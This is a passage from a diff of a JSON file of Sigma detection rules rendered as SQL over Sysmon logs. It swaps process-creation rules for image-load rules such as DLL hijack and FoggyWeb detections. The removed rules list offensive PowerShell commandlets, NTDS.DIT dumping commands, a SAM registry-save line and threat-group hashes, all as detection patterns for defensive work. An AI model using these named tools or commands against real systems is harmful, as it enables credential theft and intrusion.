package", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.t1059" ], "falsepositives": [ - "Legitimate use by administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% /account=system %' ESCAPE '\\' OR CommandLine LIKE '% /account=ti %' ESCAPE '\\') AND CommandLine LIKE '%/exec=%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_runxcmd.yml" + "filename": "image_load_pcre_net_load.yml" }, { - "title": "Malicious PowerShell Commandlets - ProcessCreation", - "id": "02030f2f-6199-49ec-b258-ea71b07e03dc", - "status": "experimental", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Wmiprvse Wbemcomn DLL Hijack", + "id": "7707a579-e0d8-4886-a853-ce47e4575aaa", + "status": "test", + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.execution", - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069", - "attack.t1059.001" + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Add-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Add-Persistence%' ESCAPE '\\' OR CommandLine LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Check-VM%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR CommandLine LIKE '%Decrypt-Hash%' ESCAPE '\\' OR CommandLine LIKE '%Do-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR CommandLine LIKE '%Exploit-Jboss%' ESCAPE '\\' OR CommandLine LIKE '%Find-Fruit%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR CommandLine LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR CommandLine LIKE '%Get-ChromeDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR CommandLine LIKE '%Get-FoxDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-GPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-IndexedItem%' ESCAPE '\\' OR CommandLine LIKE '%Get-Keystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-LSASecret%' ESCAPE '\\' OR CommandLine LIKE '%Get-PassHashes%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RickAstley%' ESCAPE '\\' OR CommandLine LIKE '%Get-Screenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServicePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR CommandLine LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-System%' ESCAPE '\\' OR CommandLine LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR CommandLine LIKE '%Get-Unconstrained%' ESCAPE '\\' OR CommandLine LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-VaultCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR CommandLine LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR CommandLine LIKE '%HTTP-Login%' ESCAPE '\\' OR CommandLine LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR CommandLine LIKE '%Install-SSP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Certify%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DAFT%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DCSync%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Farmer%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Gopher%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Grouper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Lockless%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MITM6%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PortScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PSInject%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RunAs%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SCShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StandIn%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Whisker%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WireTap%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR CommandLine LIKE '%MailRaider%' ESCAPE '\\' OR CommandLine LIKE '%New-HoneyHash%' ESCAPE '\\' OR CommandLine LIKE '%New-InMemoryModule%' ESCAPE '\\' OR CommandLine LIKE '%Out-Minidump%' ESCAPE '\\' OR CommandLine LIKE '%Port-Scan%' ESCAPE '\\' OR CommandLine LIKE '%PowerBreach%' ESCAPE '\\' OR CommandLine LIKE '%powercat %' ESCAPE '\\' OR CommandLine LIKE '%PowerUp%' ESCAPE '\\' OR CommandLine LIKE '%PowerView%' ESCAPE '\\' OR CommandLine LIKE '%Remove-Update%' ESCAPE '\\' OR CommandLine LIKE '%Set-MacAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-Wallpaper%' ESCAPE '\\' OR CommandLine LIKE '%Show-TargetScreen%' ESCAPE '\\' OR CommandLine LIKE '%Start-CaptureServer%' ESCAPE '\\' OR CommandLine LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR CommandLine LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_malicious_cmdlets.yml" + "filename": "image_load_wmiprvse_wbemcomn_dll_hijack.yml" }, { - "title": "GALLIUM IOCs", - "id": "440a56bf-7873-4439-940a-1c8a671073c2", + "title": "FoggyWeb Backdoor DLL Loading", + "id": "640dc51c-7713-4faa-8a0e-e7c0d9d4654c", "status": "test", - "description": "Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report.", - "author": "Tim Burrell", + "description": "Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected \"version.dll\" dll", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.command_and_control", - "attack.t1212", - "attack.t1071", - "attack.g0093" + "attack.resource_development", + "attack.t1587" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%SHA256=9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd%' ESCAPE '\\' OR Hashes LIKE '%SHA256=7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29%' ESCAPE '\\' OR Hashes LIKE '%SHA256=52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1%' ESCAPE '\\' OR Hashes LIKE '%SHA256=7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945%' ESCAPE '\\' OR Hashes LIKE '%SHA256=51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9%' ESCAPE '\\' OR Hashes LIKE '%SHA256=889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79%' ESCAPE '\\' OR Hashes LIKE '%SHA256=332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf%' ESCAPE '\\' OR Hashes LIKE '%SHA256=44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08%' ESCAPE '\\' OR Hashes LIKE '%SHA256=63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef%' ESCAPE '\\' OR Hashes LIKE '%SHA256=056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070%' ESCAPE '\\' OR Hashes LIKE '%SHA1=53a44c2396d15c3a03723fa5e5db54cafd527635%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9c5e496921e3bc882dc40694f1dcc3746a75db19%' ESCAPE '\\' OR Hashes LIKE '%SHA1=aeb573accfd95758550cf30bf04f389a92922844%' ESCAPE '\\' OR Hashes LIKE '%SHA1=79ef78a797403a4ed1a616c68e07fff868a8650a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4f6f38b4cec35e895d91c052b1f5a83d665c2196%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e841a63e47361a572db9a7334af459ddca11347a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c28f606df28a9bc8df75a4d5e5837fc5522dd34d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2e94b305d6812a9f96e6781c888e48c7fb157b6b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=dd44133716b8a241957b912fa6a02efde3ce3025%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8793bf166cb89eb55f0593404e4e933ab605e803%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a39b57032dbb2335499a51e13470a7cd5d86b138%' ESCAPE '\\' OR Hashes LIKE '%SHA1=41cc2b15c662bc001c0eb92f6cc222934f0beeea%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d209430d6af54792371174e70e27dd11d3def7a7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1c6452026c56efd2c94cea7e0f671eb55515edb0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c6b41d3afdcdcaf9f442bbe772f5da871801fd5a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4923d460e22fbbf165bbbaba168e5a46b8157d9f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f201504bd96e81d0d350c3a8332593ee1c9e09de%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ddd2db1127632a2a52943a2fe516a2e7d05d70d2%' ESCAPE '\\') OR sha256 IN ('9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd', '7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b', '657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5', '2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29', '52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77', 'a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3', '5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022', '6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883', '3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e', '1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7', 'fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1', '7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c', '178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945', '51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9', '889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79', '332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf', '44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08', '63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef', '056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070') OR sha1 IN ('53a44c2396d15c3a03723fa5e5db54cafd527635', '9c5e496921e3bc882dc40694f1dcc3746a75db19', 'aeb573accfd95758550cf30bf04f389a92922844', '79ef78a797403a4ed1a616c68e07fff868a8650a', '4f6f38b4cec35e895d91c052b1f5a83d665c2196', '1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d', 'e841a63e47361a572db9a7334af459ddca11347a', 'c28f606df28a9bc8df75a4d5e5837fc5522dd34d', '2e94b305d6812a9f96e6781c888e48c7fb157b6b', 'dd44133716b8a241957b912fa6a02efde3ce3025', '8793bf166cb89eb55f0593404e4e933ab605e803', 'a39b57032dbb2335499a51e13470a7cd5d86b138', '41cc2b15c662bc001c0eb92f6cc222934f0beeea', 'd209430d6af54792371174e70e27dd11d3def7a7', '1c6452026c56efd2c94cea7e0f671eb55515edb0', 'c6b41d3afdcdcaf9f442bbe772f5da871801fd5a', '4923d460e22fbbf165bbbaba168e5a46b8157d9f', 'f201504bd96e81d0d350c3a8332593ee1c9e09de', 'ddd2db1127632a2a52943a2fe516a2e7d05d70d2')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE 'C:\\\\Windows\\\\ADFS\\\\version.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_gallium_iocs.yml" + "filename": "image_load_malware_foggyweb_nobelium.yml" }, { - "title": "Suspicious Process Patterns NTDS.DIT Exfil", - "id": "8bc64091-6875-4881-aaf9-7bd25b5dda08", + "title": "Suspicious Volume Shadow Copy Vssapi.dll Load", + "id": "37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", "status": "experimental", - "description": "Detects suspicious process patterns used in NTDS.DIT exfiltration", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the image load of VSS DLL by uncommon executables", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.defense_evasion", + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\NTDSDump.exe' ESCAPE '\\' OR Image LIKE '%\\\\NTDSDumpEx.exe' ESCAPE '\\') OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND CommandLine LIKE '%system.hiv%' ESCAPE '\\') OR CommandLine LIKE '%NTDSgrab.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%ac i ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%/c copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\') OR (CommandLine LIKE '%activate instance ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%ntds.dit%' ESCAPE '\\')) OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND ((ParentImage LIKE '%\\\\apache%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\apache%' ESCAPE '\\' OR Image LIKE '%\\\\tomcat%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE '\tC:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_ntds.yml" + "filename": "image_load_dll_vssapi_susp_load.yml" }, { - "title": "Potential Emotet Rundll32 Execution", - "id": "54e57ce3-0672-46eb-a402-2c0948d5e3e9", + "title": "Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded", + "id": "bdc64095-d59a-42a2-8588-71fd9c9d9abc", "status": "test", - "description": "Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL", - "author": "FPT.EagleEye", + "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", + "author": "Perez Diego (@darkquassar), oscd.community, Ecco", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,RunDLL' ESCAPE '\\' OR CommandLine LIKE '%,Control\\_RunDLL' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%.dll,Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll\",Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll'',Control\\_RunDLL' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\tracker.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND Signed = 'false')" ], - "filename": "proc_creation_win_malware_emotet_rundll32_execution.yml" + "filename": "image_load_dll_dbghelp_dbgcore_unsigned_load.yml" }, { - "title": "Lazarus Group Activity", - "id": "24c4d154-05a4-4b99-b57d-9b977472443a", - "status": "test", - "description": "Detects different process execution behaviors as described in various threat reports on Lazarus group activity", - "author": "Florian Roth (Nextron Systems), wagga", + "title": "DLL Sideloading Of DBGCORE.DLL", + "id": "9ca2bf31-0570-44d8-a543-534c47c33ed7", + "status": "experimental", + "description": "Detects DLL sideloading of \"dbgcore.dll\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.g0032", - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unlikely" + "Legitimate applications loading their own versions of the DLL mentioned in this rule" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%reg.exe save hklm\\\\sam \\%temp\\%\\\\~reg\\_sam.save%' ESCAPE '\\' OR CommandLine LIKE '%1q2w3e4r@#$@#$@#$%' ESCAPE '\\' OR CommandLine LIKE '% -hp1q2w3e4 %' ESCAPE '\\' OR CommandLine LIKE '%.dat data03 10000 -p %' ESCAPE '\\') OR (CommandLine LIKE '%netstat -aon | find %' ESCAPE '\\' AND CommandLine LIKE '%ESTA%' ESCAPE '\\' AND CommandLine LIKE '% > \\%temp\\%\\\\~%' ESCAPE '\\') OR (CommandLine LIKE '%.255 10 C:\\\\ProgramData\\\\IBM\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.DAT%' ESCAPE '\\') OR (CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '% -p 0x%' ESCAPE '\\' AND (CommandLine 